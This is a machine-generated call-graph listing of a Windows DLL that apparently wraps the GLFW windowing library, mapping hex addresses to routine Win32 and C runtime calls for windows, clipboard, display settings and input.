6857->6772 6857->6797 6858->6857 6860 64608f84 6859->6860 6861 64609b0e 6860->6861 6862 64609b72 6861->6862 6863 64609b17 GetModuleHandleW 6861->6863 6862->6862 6864 64609b57 6863->6864 6864->6862 6865 64609b5e 6864->6865 6866 64602ef4 6 API calls 6865->6866 6866->6862 6868 6460ac03 CreateDCW SetDeviceGammaRamp DeleteDC 6867->6868 6869 6460abe9 6867->6869 6868->6831 6869->6868 6871 646057c2 6870->6871 6872 64605782 6870->6872 6871->6831 6913 64605737 free free free 6872->6913 6874 64605795 6914 64605737 free free free 6874->6914 6876 646057a0 free free 6876->6871 6878 64606aa5 FreeLibrary 6877->6878 6879 64606ab7 6877->6879 6878->6834 6879->6834 6881 64608fb4 6880->6881 6882 64608faa UnregisterDeviceNotification 6880->6882 6883 64608fc7 6881->6883 6884 64608fbd DestroyWindow 6881->6884 6882->6881 6915 6460bc2e GetModuleHandleW UnregisterClassW 6883->6915 6884->6883 6886 64608fcc SystemParametersInfoW free free 6916 646076c4 6886->6916 6888 64609014 6889 646021b5 FreeLibrary 6888->6889 6890 64609019 6889->6890 6919 64609957 6890->6919 6893 64609031 6895 64609044 6893->6895 6896 6460903a FreeLibrary 6893->6896 6894 64609027 FreeLibrary 6894->6893 6897 64609057 6895->6897 6898 6460904d FreeLibrary 6895->6898 6896->6895 6899 64609060 FreeLibrary 6897->6899 6900 6460906a 6897->6900 6898->6897 6899->6900 6901 64609073 FreeLibrary 6900->6901 6902 6460907d 6900->6902 6901->6902 6903 64609090 6902->6903 6904 64609086 FreeLibrary 6902->6904 6905 646090a3 6903->6905 6906 64609099 FreeLibrary 6903->6906 6904->6903 6905->6836 6906->6905 6908 64602e40 6907->6908 6909 6460ad59 TlsFree 6907->6909 6908->6841 6909->6908 6911 64602e58 6910->6911 6912 6460ae55 DeleteCriticalSection 6910->6912 6911->6750 6912->6911 6913->6874 6914->6876 6915->6886 6917 646076cd FreeLibrary 6916->6917 6918 646076df 6916->6918 6917->6888 6918->6888 6920 64609963 6919->6920 6922 6460901e 6920->6922 6923 646090cb 6920->6923 6922->6893 6922->6894 6924 646090f0 free 6923->6924 6925 646090db 6923->6925 6928 64603763 free free free free 6924->6928 6925->6924 6927 64609103 6927->6920 6928->6927 7879 6460cd61 IsZoomed 7884 6460d968 7885 6460d981 7884->7885 7886 6460deb9 DefWindowProcW 7884->7886 7889 6460d109 7885->7889 7890 6460d120 ClipCursor 7889->7890 7891 6460d11b 7889->7891 7899 6460d093 ClientToScreen SetCursorPos 7890->7899 7895 6460ba76 RegisterRawInputDevices 7891->7895 7894 6460d154 7896 6460bab0 7895->7896 7897 6460bac4 7895->7897 7898 64608298 9 API calls 7896->7898 7897->7890 7898->7897 7899->7894 6929 6460496f 6930 64604982 6929->6930 6931 646049a8 6930->6931 6955 646049ee 6930->6955 6932 64602ef4 6 API calls 6931->6932 6934 646049c2 6932->6934 6933 646049cd strcspn 6933->6955 6936 64604f3f 6934->6936 6935 64604ef4 strspn 6938 64604a02 6935->6938 6937 64604a18 strcspn 6939 64604c38 6937->6939 6937->6955 6938->6936 6964 6460330d 6938->6964 6941 64602ef4 6 API calls 6939->6941 6943 64604c4c 6941->6943 6942 64604c5a strcspn 6942->6939 6942->6955 6944 64604cc9 strlen strncmp 6944->6955 6945 64604e67 6957 64609f29 strcmp 6945->6957 6947 64604e2c strcspn strspn 6947->6955 6948 64604e0c strncmp 6948->6947 6948->6955 6952 64604ee6 6952->6935 6953 64604eae realloc 6953->6952 6954 64604f46 strtoul 6954->6955 6955->6933 6955->6935 6955->6937 6955->6938 6955->6939 6955->6942 6955->6944 6955->6945 6955->6947 6955->6948 6955->6954 6956 64604d7e strtoul strtoul 6955->6956 6956->6955 6958 64609f4b strncpy sprintf 6957->6958 6959 64604e9f 6957->6959 6958->6959 6960 646032ba 6959->6960 6961 646032d5 6960->6961 6962 64603301 6961->6962 6963 646032da strcmp 6961->6963 6962->6952 6962->6953 6963->6961 6963->6962 6965 646032ba strcmp 6964->6965 6966 64603320 6965->6966 6967 64602ef4 6 API calls 6966->6967 6968 646033a0 6966->6968 6967->6968 6968->6938 7943 6460d375 7944 6460deb9 DefWindowProcW 7943->7944 7945 6460d37d 7943->7945 7945->7944 7946 6460d39a 7945->7946 7948 6460d038 7945->7948 7946->7944 7949 6460cfe6 2 API calls 7948->7949 7950 6460d05e 7949->7950 7951 6460ba29 2 API calls 7950->7951 7952 6460d065 7951->7952 7953 646037ac 3 API calls 7952->7953 7954 6460d06d 7953->7954 7955 6460b169 4 API calls 7954->7955 7956 6460d074 7955->7956 7956->7946 7957 64601378 7958 64601342 7957->7958 7960 64601288 7958->7960 7961 64601020 7958->7961 7962 6460102e 7961->7962 7964 646010a0 7961->7964 7966 64601050 Sleep 7962->7966 7967 64601070 7962->7967 7976 6460108f 7962->7976 7963 64601150 7963->7960 7964->7963 7965 646010e2 7964->7965 7970 646010c8 Sleep 7964->7970 7971 64601200 _amsg_exit 7965->7971 7972 646010f2 7965->7972 7966->7962 7968 64601160 7967->7968 7969 6460107e _amsg_exit 7967->7969 7979 64611eb0 _lock _unlock 7968->7979 7969->7976 7970->7964 7971->7960 7974 646011b0 _initterm 7972->7974 7975 646010ff 7972->7975 7974->7975 7977 646011d8 _initterm 7975->7977 7978 6460110d 7975->7978 7976->7960 7977->7978 7978->7960 7980 64611f0d 7979->7980 7981 64611eef free 7979->7981 7980->7976 7981->7980 7983 6460197e 7984 646019a2 7983->7984 7986 64601991 7983->7986 7985 6460ad78 TlsGetValue 7984->7985 7985->7986 7987 64602ef4 6 API calls 7986->7987 7988 646019cc 7986->7988 7989 646019c6 7987->7989 7994 64602f44 7995 64602ff9 strcpy 7994->7995 7996 64603001 7995->7996 7997 6460306c strcpy 7996->7997 7999 6460ad78 TlsGetValue 7996->7999 7998 64603087 7997->7998 8000 6460301b 7999->8000 8000->7997 8001 64603021 calloc 8000->8001 8002 6460adb6 TlsSetValue 8001->8002 8003 64603047 8002->8003 8004 6460ae74 EnterCriticalSection 8003->8004 8005 64603053 8004->8005 8006 6460aeb2 LeaveCriticalSection 8005->8006 8006->7997 8007 6460cd46 IsWindowVisible 8008 64607147 8009 6460ad78 TlsGetValue 8008->8009 8010 6460715d 8009->8010 8014 646071a5 8010->8014 8015 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8010->8015 8012 64607185 8012->8014 8016 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8012->8016 8015->8012 8016->8014 8028 6460734b 8029 6460735e 8028->8029 8030 64607363 GetProcAddress 8029->8030 8031 64607377 8029->8031 8030->8031 8037 64602155 8038 64602165 8037->8038 8039 6460adb6 TlsSetValue 8037->8039 8039->8038 8040 64610d54 8041 64610d58 8040->8041 8042 64610d4a 8041->8042 8043 64610ba0 4 API calls 8041->8043 8043->8042 6969 6460d15f GetPropW 6970 6460d238 6969->6970 6971 6460d19e 6969->6971 6974 6460d2de 6970->6974 6990 6460d247 6970->6990 6972 6460d1c4 6971->6972 6973 6460d1a7 6971->6973 7043 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6972->7043 6975 6460d1b0 6973->6975 6976 6460d1ea 6973->6976 6979 6460deb9 DefWindowProcW 6974->6979 6980 6460dc10 6974->6980 6981 6460d319 6974->6981 6975->6979 6982 6460d1ba 6975->6982 6978 6460d1f3 6976->6978 6998 6460d20f 6976->6998 6978->6979 7021 6460998c 6978->7021 6980->6979 7049 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6980->7049 6984 6460d33a 6981->6984 6985 6460d31b 6981->6985 7031 6460a331 6982->7031 6983 6460d1d0 6983->6979 6989 6460d1d8 EnableNonClientDpiScaling 6983->6989 6991 6460dbf9 6984->6991 7012 6460d20a 6984->7012 6999 6460d2d9 6985->6999 6985->7012 7050 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6985->7050 6986 6460d299 6994 6460d2b4 6986->6994 6995 6460d29b 6986->6995 6987 6460dada 6987->6979 6993 6460dae4 6987->6993 6989->6979 6990->6979 6990->6986 6990->6987 6990->7012 6991->6999 7003 6460b89f 12 API calls 6991->7003 7048 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6993->7048 7005 64608533 2 API calls 6994->7005 6994->7012 6995->6979 6995->7012 7051 6460ba29 6995->7051 6996 6460d1bf 6996->6979 6998->6979 7044 64609eed 6998->7044 7000 6460dc29 7000->6979 7004 6460dc31 GetDpiForWindow 7000->7004 7003->6999 7009 6460dc67 7004->7009 7005->7012 7006 6460daf0 7010 6460daf9 GetDpiForWindow 7006->7010 7015 6460db0b 7006->7015 7014 6460dc70 AdjustWindowRectExForDpi 7009->7014 7010->7015 7011 6460dd1b 7011->7012 7013 6460dd1f SetWindowPos 7011->7013 7012->6979 7012->6999 7013->7012 7016 6460dc99 7014->7016 7017 6460b1d6 6 API calls 7015->7017 7018 6460dca2 AdjustWindowRectExForDpi 7016->7018 7019 6460db3f 7017->7019 7018->6999 7019->6999 7020 6460db81 MonitorFromWindow GetMonitorInfoW 7019->7020 7020->6999 7022 64609a10 7021->7022 7027 6460999f 7021->7027 7023 64609a50 7022->7023 7028 64609add 7022->7028 7024 64602ef4 6 API calls 7023->7024 7025 64609a64 7024->7025 7025->7028 7026 64609a88 sprintf 7026->7027 7026->7028 7027->7022 7027->7026 7027->7028 7030 646099ca 7027->7030 7028->7012 7030->7027 7056 646036a2 7030->7056 7032 6460a377 7031->7032 7033 6460a34e calloc 7031->7033 7034 6460a381 EnumDisplayDevicesW 7032->7034 7035 6460a562 free 7032->7035 7037 6460a3eb EnumDisplayDevicesW 7032->7037 7039 6460a4dd wcscmp 7032->7039 7040 6460a451 wcscmp 7032->7040 7041 64609f84 34 API calls 7032->7041 7042 646057c8 48 API calls 7032->7042 7033->7032 7034->7032 7036 6460a53a 7034->7036 7035->6996 7036->7035 7063 646057c8 7036->7063 7037->7032 7039->7032 7040->7032 7041->7032 7042->7032 7043->6983 7045 64609ef9 7044->7045 7047 64609f23 7045->7047 7128 64609b7b 7045->7128 7047->7012 7048->7006 7049->7000 7050->7011 7052 6460ba3f 7051->7052 7053 6460ba46 SetCursor 7051->7053 7052->7053 7054 6460ba4b LoadCursorW 7052->7054 7053->7012 7054->7053 7057 646036b3 7056->7057 7061 646036c5 7057->7061 7062 64602e69 strlen calloc strcpy 7057->7062 7059 646036e7 calloc calloc calloc strncpy 7060 6460330d 7 API calls 7059->7060 7060->7061 7061->7030 7062->7059 7064 646057e2 realloc 7063->7064 7070 6460583f 7063->7070 7065 64605810 memmove 7064->7065 7066 64605836 7064->7066 7065->7066 7066->7036 7067 646058f1 7067->7066 7069 64605912 memmove 7067->7069 7068 6460c043 GetClientRect 7068->7070 7069->7066 7070->7066 7070->7067 7070->7068 7074 6460c9ba 7070->7074 7105 6460c2a3 7070->7105 7114 6460bf52 7070->7114 7075 6460c9e6 7074->7075 7076 6460cadc 7074->7076 7077 6460c9fa 7075->7077 7079 6460cd03 7075->7079 7082 6460b0a6 21 API calls 7075->7082 7078 6460caea 7076->7078 7081 6460b80c 7 API calls 7076->7081 7122 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7077->7122 7085 6460cbc3 GetWindowLongW 7078->7085 7086 6460cb0c 7078->7086 7079->7070 7081->7078 7082->7077 7083 6460ca2b 7084 6460ca2f GetDpiForWindow 7083->7084 7093 6460ca7b 7083->7093 7102 6460ca51 7084->7102 7089 6460cbfd 7085->7089 7090 6460cc2f 7085->7090 7087 6460cb76 7086->7087 7088 6460cb2a GetWindowLongW 7086->7088 7092 6460b0a6 21 API calls 7087->7092 7123 6460b543 7088->7123 7097 6460cc0f SetWindowLongW 7089->7097 7125 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7090->7125 7096 6460cb7d GetMonitorInfoW 7092->7096 7100 6460ca8b AdjustWindowRectEx 7093->7100 7099 6460ccf1 SetWindowPos 7096->7099 7097->7090 7098 6460cc47 7101 6460cc4b GetDpiForWindow 7098->7101 7103 6460cc9a 7098->7103 7099->7079 7100->7102 7101->7102 7102->7099 7104 6460ccaa AdjustWindowRectEx 7103->7104 7104->7102 7106 6460c043 GetClientRect 7105->7106 7107 6460c2c8 SetRect 7106->7107 7126 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7107->7126 7109 6460c2fe 7110 6460c302 GetDpiForWindow 7109->7110 7111 6460c34e 7109->7111 7113 6460c324 7110->7113 7112 6460c35e AdjustWindowRectEx 7111->7112 7112->7113 7113->7070 7127 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 7114->7127 7116 6460bf7f 7117 6460bf83 GetDpiForWindow 7116->7117 7119 6460bfcf 7116->7119 7118 6460bfa5 7117->7118 7121 6460bffb SetWindowPos 7118->7121 7120 6460bfdf AdjustWindowRectEx 7119->7120 7120->7121 7121->7070 7122->7083 7124 6460b550 SetWindowLongW 7123->7124 7124->7087 7125->7098 7126->7109 7127->7116 7129 64609d30 7128->7129 7132 64609b95 7128->7132 7130 646090cb 5 API calls 7129->7130 7133 64609c0b 7129->7133 7130->7133 7131 646090cb 5 API calls 7131->7133 7132->7131 7132->7133 7133->7045 8073 64604326 8074 64604334 8073->8074 8075 64604394 8074->8075 8076 64604378 8074->8076 8077 646043b5 8075->8077 8078 64604399 8075->8078 8079 64602ef4 6 API calls 8076->8079 8081 6460438f 8077->8081 8082 64609b7b 5 API calls 8077->8082 8080 64602ef4 6 API calls 8078->8080 8079->8081 8080->8081 8082->8081 8083 64610b26 8084 64610b30 8083->8084 8085 646107e0 11 API calls 8084->8085 8086 64610aa0 8084->8086 8088 64610935 8084->8088 8085->8084 8087 64610ad2 VirtualProtect 8086->8087 8086->8088 8087->8086 8089 6460cd2b IsIconic 8090 64611f30 wcstombs 8091 64611f62 malloc wcstombs 8090->8091 8092 64611f87 wcstombs 8090->8092 8091->8092 8093 64611fa6 malloc wcstombs 8092->8093 8094 64611fcb _assert free 8092->8094 8093->8094 8104 64604938 8105 64604947 8104->8105 8106 6460495b 8104->8106 8107 64602ef4 6 API calls 8105->8107 8107->8106 8108 6460bd39 8109 6460be3c GetClassLongW GetClassLongW 8108->8109 8110 6460bd4f GetSystemMetrics GetSystemMetrics 8108->8110 8111 6460be3a 8109->8111 8116 6460bd89 8110->8116 8112 6460bed4 8111->8112 8113 6460beca DestroyIcon 8111->8113 8114 6460bee8 8112->8114 8115 6460bede DestroyIcon 8112->8115 8113->8112 8115->8114 8117 6460b26a 17 API calls 8116->8117 8118 6460be25 8117->8118 8119 6460b26a 17 API calls 8118->8119 8119->8111 8120 6460f93a 8121 6460f948 8120->8121 8122 6460f984 8121->8122 8123 6460f96e 8121->8123 8124 6460f982 8122->8124 8127 6460c46e ShowWindow 8122->8127 8125 64602ef4 6 API calls 8123->8125 8125->8124 8127->8124 8136 6460bf02 ClientToScreen 8137 6460bf3d 8136->8137 8138 64601906 8139 64601914 8138->8139 8140 6460196e 8139->8140 8141 64602ef4 6 API calls 8139->8141 8142 64601968 8141->8142 8143 64610d07 8144 64610ce8 free 8143->8144 8146 64610cf0 LeaveCriticalSection 8144->8146 8147 64611508 8148 64611510 8147->8148 8149 64611c20 _errno 8148->8149 8151 6461153a 8149->8151 8150 64611428 8151->8150 8152 64611950 _errno 8151->8152 8152->8150 8153 64610308 8154 64610311 8153->8154 8155 6461032d 8153->8155 8156 64602ef4 6 API calls 8154->8156 8155->8155 8157 6461032b 8156->8157 8168 64611316 8169 64611320 8168->8169 8170 64611c20 _errno 8169->8170 8171 6461137a 8169->8171 8170->8171 8172 64609118 8173 646092b9 8172->8173 8174 64609144 memcmp 8172->8174 8175 64609174 memcmp 8174->8175 8181 64609163 8174->8181 8176 6460919b memcmp 8175->8176 8175->8181 8177 646091c2 memcmp 8176->8177 8176->8181 8178 646091e6 memcmp 8177->8178 8177->8181 8179 6460920a memcmp 8178->8179 8178->8181 8179->8181 8182 6460922e memcmp 8179->8182 8180 6460929d memcmp 8180->8173 8181->8173 8181->8180 8182->8173 8182->8181 8183 6460eb1c 8184 6460eb2e 8183->8184 8186 6460eb85 strncpy 8184->8186 8188 6460ebc9 8184->8188 8187 6460ebe1 8186->8187 8189 64602ef4 6 API calls 8188->8189 8189->8187 8190 64606de0 8191 64606dee 8190->8191 8192 64606e32 8191->8192 8193 64606e1a 8191->8193 8195 64606bcb 14 API calls 8192->8195 8194 64602ef4 6 API calls 8193->8194 8196 64606e2e 8194->8196 8195->8196 6714 6460ebe8 6715 6460ec12 6714->6715 6716 6460ebfc 6714->6716 6719 6460ad78 TlsGetValue 6715->6719 6724 6460ec4b 6715->6724 6717 64602ef4 6 API calls 6716->6717 6718 6460ec10 6717->6718 6718->6724 6720 6460ec33 6719->6720 6721 6460ec43 6720->6721 6722 6460ec37 glfwMakeContextCurrent 6720->6722 6725 6460bc57 6721->6725 6722->6721 6726 6460bc67 6725->6726 6727 6460bc6e 6725->6727 6735 6460b80c 6726->6735 6729 6460bcc6 6727->6729 6730 6460bc99 RemovePropW DestroyWindow 6727->6730 6731 6460bcd0 DestroyIcon 6729->6731 6732 6460bcda 6729->6732 6730->6729 6731->6732 6733 6460bce4 DestroyIcon 6732->6733 6734 6460bcee 6732->6734 6733->6734 6734->6724 6736 6460b89a 6735->6736 6737 6460b81d 6735->6737 6736->6727 6738 6460b825 SetThreadExecutionState 6737->6738 6739 6460b87c 6737->6739 6744 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6738->6744 6745 6460a572 6739->6745 6741 6460b84f 6741->6739 6742 6460b853 SystemParametersInfoW 6741->6742 6742->6739 6744->6741 6746 6460a585 ChangeDisplaySettingsExW 6745->6746 6747 6460a5be 6745->6747 6746->6747 6747->6736 8201 6460dbec 8202 6460dbf4 8201->8202 8203 6460deb9 DefWindowProcW 8202->8203 8204 646105ec 8205 646105f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess abort 8204->8205 8206 6461068c 8205->8206 8207 64610690 8206->8207 8208 64610d20 7 API calls 8206->8208 8209 646106b8 8208->8209 8210 646053ed 8211 646053f6 OpenClipboard 8210->8211 8212 646053fb 8210->8212 8216 6460e3e5 8211->8216 8217 6460e3fb GetClipboardData 8211->8217 8214 64602ef4 6 API calls 8212->8214 8215 64605415 8214->8215 8218 64608298 9 API calls 8216->8218 8219 6460e415 8217->8219 8220 6460e42d GlobalLock 8217->8220 8221 6460e3f9 8218->8221 8222 64608298 9 API calls 8219->8222 8223 6460e457 free 8220->8223 8224 6460e43d 8220->8224 8226 6460e429 CloseClipboard 8222->8226 8230 6460844c WideCharToMultiByte 8223->8230 8227 64608298 9 API calls 8224->8227 8226->8221 8229 6460e451 CloseClipboard 8227->8229 8229->8221 8231 646084a2 8230->8231 8232 646084b8 calloc WideCharToMultiByte 8230->8232 8233 64608298 9 API calls 8231->8233 8234 646084b6 GlobalUnlock CloseClipboard 8232->8234 8235 6460850b 8232->8235 8233->8234 8234->8221 8236 64608298 9 API calls 8235->8236 8237 6460851f free 8236->8237 8237->8234 8251 646037f0 8252 64603802 8251->8252 8253 64603844 8252->8253 8254 64603828 8252->8254 8256 64602ef4 6 API calls 8253->8256 8257 6460383f 8253->8257 8255 64602ef4 6 API calls 8254->8255 8255->8257 8256->8257 8258 646105f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess abort 8259 6461068c 8258->8259 8260 64610690 8259->8260 8261 64610d20 7 API calls 8259->8261 8262 646106b8 8261->8262 8263 646063f1 8264 64606405 8263->8264 8265 646064bc 8263->8265 8267 6460643b free calloc 8264->8267 8268 64606470 8264->8268 8266 6460adb6 TlsSetValue 8265->8266 8271 646064ba 8266->8271 8267->8268 8268->8265 8269 646064a6 8268->8269 8270 64602ef4 6 API calls 8269->8270 8270->8271 8272 6460cdf2 SetWindowPos 8273 64611ff3 8274 64612000 GetModuleHandleW GetProcAddress 8273->8274 8275 64601ff4 8276 64602008 FreeLibrary 8275->8276 8277 6460201c 8275->8277 8276->8277 8278 64605ff9 8279 64606008 8278->8279 8280 64606046 8279->8280 8281 6460602e 8279->8281 8287 64605737 free free free 8280->8287 8282 64602ef4 6 API calls 8281->8282 8286 64606044 8282->8286 8284 64606051 8285 6460ab26 6 API calls 8284->8285 8285->8286 8287->8284 8288 646011fb 8289 64601200 _amsg_exit 8288->8289 8290 64603dff 8291 64603e11 8290->8291 8292 6460b4a7 6 API calls 8291->8292 8293 6460e287 8292->8293 8298 646061c2 8300 646061d8 8298->8300 8299 64606287 8302 64602ef4 6 API calls 8299->8302 8300->8299 8301 646062af glfwGetGammaRamp 8300->8301 8303 646062c1 calloc 8301->8303 8304 646062aa 8301->8304 8302->8304 8307 646062d8 8303->8307 8305 6460634f glfwSetGammaRamp 8305->8304 8307->8305 8308 64611210 8307->8308 8309 6461137a 8308->8309 8310 64611240 8308->8310 8309->8307 8310->8309 8311 646113d0 8310->8311 8314 64611279 8310->8314 8312 646115c0 _errno 8311->8312 8313 646113db _errno 8311->8313 8315 646115fb 8312->8315 8313->8309 8316 64611285 8314->8316 8318 64611490 8314->8318 8315->8307 8317 6461129c 8316->8317 8322 646116d0 8316->8322 8324 64611430 8316->8324 8319 64611680 8317->8319 8321 646112e6 8317->8321 8318->8309 8320 64611c20 _errno 8318->8320 8318->8324 8326 646116a2 8319->8326 8329 64611302 8319->8329 8320->8324 8321->8324 8325 64611950 _errno 8321->8325 8321->8329 8322->8309 8323 64611c20 _errno 8322->8323 8323->8321 8324->8309 8324->8325 8325->8309 8327 646119d8 8326->8327 8328 64611aa0 _errno 8326->8328 8327->8307 8330 64611aef 8328->8330 8329->8309 8331 64611c20 _errno 8329->8331 8330->8307 8331->8309 8332 6460a5c3 8337 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8332->8337 8334 6460a5eb 8335 6460a616 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 8334->8335 8336 6460a5ef 8334->8336 8335->8336 8337->8334 8348 646113c8 8349 646113d0 8348->8349 8350 646115c0 _errno 8349->8350 8351 646113db _errno 8349->8351 8353 646115fb 8350->8353 8352 64611416 8351->8352 8367 6460d7cf 8368 6460d7e2 8367->8368 8369 6460deb9 DefWindowProcW 8367->8369 8368->8369 8370 6460d7ef GetRawInputData 8368->8370 8371 6460d850 GetRawInputData 8370->8371 8372 6460d825 free calloc 8370->8372 8373 6460d887 8371->8373 8375 6460d89b 8371->8375 8372->8371 8374 64602ef4 6 API calls 8373->8374 8374->8375 8375->8369 8376 646011d3 8377 646011d8 _initterm 8376->8377 8378 6460110d 8377->8378 8379 646013d9 8380 646013e0 8379->8380 8399 64610530 8380->8399 8382 646013c6 8385 64601220 8382->8385 8384 646013d3 8386 646012a0 8385->8386 8387 64601237 8385->8387 8388 64610920 12 API calls 8386->8388 8395 64601281 8387->8395 8403 64610920 8387->8403 8390 646012a5 8388->8390 8391 64601020 9 API calls 8390->8391 8396 646012f3 8390->8396 8393 646012c1 8391->8393 8392 64601245 8394 64601020 9 API calls 8392->8394 8393->8395 8393->8396 8415 64610510 8393->8415 8394->8395 8395->8384 8396->8395 8397 64601020 9 API calls 8396->8397 8397->8395 8400 64610553 8399->8400 8401 64610568 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 8399->8401 8400->8382 8402 646105bf 8401->8402 8402->8382 8404 64610940 8403->8404 8405 64610935 8403->8405 8404->8405 8406 64610b30 8404->8406 8407 64610b82 8404->8407 8411 646107e0 11 API calls 8404->8411 8412 64610780 11 API calls 8404->8412 8413 64610a9d 8404->8413 8405->8392 8406->8405 8408 646107e0 11 API calls 8406->8408 8406->8413 8409 64610780 11 API calls 8407->8409 8408->8406 8410 64610b92 8409->8410 8411->8404 8412->8404 8413->8405 8414 64610ad2 VirtualProtect 8413->8414 8414->8413 8416 64610519 8415->8416 8417 646104b0 8415->8417 8416->8396 8418 646013f0 5 API calls 8417->8418 8419 646104e0 8418->8419 8419->8396 8420 646019dc 8421 646019ec 8420->8421 8422 64601a31 8421->8422 8423 64601a12 8421->8423 8425 6460ad78 TlsGetValue 8422->8425 8424 64602ef4 6 API calls 8423->8424 8432 64601a29 8424->8432 8426 64601a3d 8425->8426 8427 64601a43 8426->8427 8429 64601abd 8426->8429 8431 64601a76 8426->8431 8428 64602ef4 6 API calls 8427->8428 8428->8432 8429->8427 8430 64601ae7 8429->8430 8433 646017ee 2 API calls 8430->8433 8431->8427 8431->8432 8434 64601aaa strcmp 8431->8434 8433->8432 8434->8431 8434->8432 8435 646071dd 8436 6460726c SwapBuffers 8435->8436 8437 646071ee 8435->8437 8442 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8437->8442 8439 6460720a 8439->8436 8443 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8439->8443 8441 6460722a 8441->8436 8442->8439 8443->8441 8467 6460d3de 8468 6460d109 13 API calls 8467->8468 8469 6460d3ec 8468->8469 8470 6460d400 8469->8470 8472 6460c402 ShowWindow 8469->8472 8472->8470 8477 64606da7 8478 64606dd2 8477->8478 8479 64606db6 8477->8479 8481 64606bcb 14 API calls 8478->8481 8480 64602ef4 6 API calls 8479->8480 8482 64606dcd 8480->8482 8481->8482 8496 6460c1a9 8497 6460c1b9 8496->8497 8498 6460c1cb GetWindowRect MoveWindow 8497->8498 8499 6460c21d 8497->8499 8498->8499 8500 6460d3a9 8501 6460d3b9 8500->8501 8502 6460d3c7 8501->8502 8503 6460deb9 DefWindowProcW 8501->8503 8504 6460d3d7 8502->8504 8505 6460d038 11 API calls 8502->8505 8505->8504 8511 646011ab 8512 646011b0 _initterm 8511->8512 8513 646010ff 8512->8513 8514 646011d8 _initterm 8513->8514 8515 6460110d 8513->8515 8514->8515 8516 64606fab 8517 64606fc7 8516->8517 8518 64607052 8517->8518 8519 6460703c 8517->8519 8521 64606bcb 14 API calls 8518->8521 8520 64602ef4 6 API calls 8519->8520 8528 64607050 8520->8528 8522 6460705e 8521->8522 8523 64607086 8522->8523 8524 6460706b 8522->8524 8522->8528 8525 646070aa 8523->8525 8526 6460708f 8523->8526 8527 64602ef4 6 API calls 8524->8527 8530 6460e522 8525->8530 8531 6460e53d GetModuleHandleW 8525->8531 8529 64602ef4 6 API calls 8526->8529 8527->8528 8529->8528 8532 64602ef4 6 API calls 8530->8532 8534 6460e58e 8531->8534 8533 6460e53b 8532->8533 8534->8533 8535 64602ef4 6 API calls 8534->8535 8535->8533 8536 646013b0 8537 646013e0 8536->8537 8540 646013c6 8536->8540 8538 64610530 5 API calls 8537->8538 8538->8540 8539 64601220 26 API calls 8541 646013d3 8539->8541 8540->8539 8542 6460d9b3 8543 6460d9ca 8542->8543 8544 6460b169 4 API calls 8543->8544 8546 6460d9f0 8543->8546 8544->8546 8545 6460da67 8546->8545 8547 6460da62 8546->8547 8548 6460da69 8546->8548 8550 6460b80c 7 API calls 8547->8550 8549 6460b0a6 21 API calls 8548->8549 8551 6460da6e 8549->8551 8550->8545 8553 6460af9b GetMonitorInfoW SetWindowPos 8551->8553 8553->8545 8558 6460cfb5 PostMessageW 8559 646115b7 8560 646115c0 _errno 8559->8560 8561 646115fb 8560->8561 8603 64601186 8604 646010e4 8603->8604 8605 64601200 _amsg_exit 8604->8605 8606 646010f2 8604->8606 8607 646011b0 _initterm 8606->8607 8608 646010ff 8606->8608 8607->8608 8609 646011d8 _initterm 8608->8609 8610 6460110d 8608->8610 8609->8610 8615 6460cd88 8616 6460cd9a 8615->8616 8618 6460cdb6 8615->8618 8619 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 8616->8619 8619->8618 8620 64603f89 8621 64603fb3 8620->8621 8622 64603f9d 8620->8622 8624 64603fd8 calloc 8621->8624 8625 64603fbe 8621->8625 8623 64602ef4 6 API calls 8622->8623 8626 64603fb1 8623->8626 8631 6460e19e 8624->8631 8627 64602ef4 6 API calls 8625->8627 8627->8626 8630 6460400b glfwDestroyCursor 8630->8626 8632 6460e1ae 8631->8632 8633 6460e1ff LoadImageW 8632->8633 8635 64604007 8632->8635 8634 6460e242 8633->8634 8633->8635 8636 64608298 9 API calls 8634->8636 8635->8626 8635->8630 8636->8635 8637 64605b8c 8638 64605ba2 EnumDisplaySettingsExW 8637->8638 8640 6460a6fb 8638->8640 8641 6460318d 8642 646031a0 8641->8642 8643 646031ae 8641->8643 8642->8643 8644 64602ef4 6 API calls 8642->8644 8644->8643 8645 6460d98e 8646 6460d038 11 API calls 8645->8646 8647 6460d9ae DefWindowProcW 8646->8647 8649 6460dd8f DragQueryFileW calloc DragQueryPoint 8654 6460ddf8 8649->8654 8650 6460de77 8652 6460de91 free 8650->8652 8653 6460de9f free DragFinish 8650->8653 8651 6460de22 calloc 8651->8654 8652->8650 8654->8650 8654->8651 8655 6460844c 13 API calls 8654->8655 8656 6460de66 free 8655->8656 8656->8654 8657 64605f92 8658 64605fa0 8657->8658 8659 64605fc6 8658->8659 8660 64605fde 8658->8660 8662 64602ef4 6 API calls 8659->8662 8661 6460a79f EnumDisplaySettingsW 8660->8661 8663 64605fda 8661->8663 8662->8663 8664 64605394 8665 646053a2 8664->8665 8666 6460e316 8665->8666 8667 6460e2e5 GlobalAlloc 8665->8667 8668 6460e302 8667->8668 8669 6460e31b GlobalLock 8667->8669 8672 64608298 9 API calls 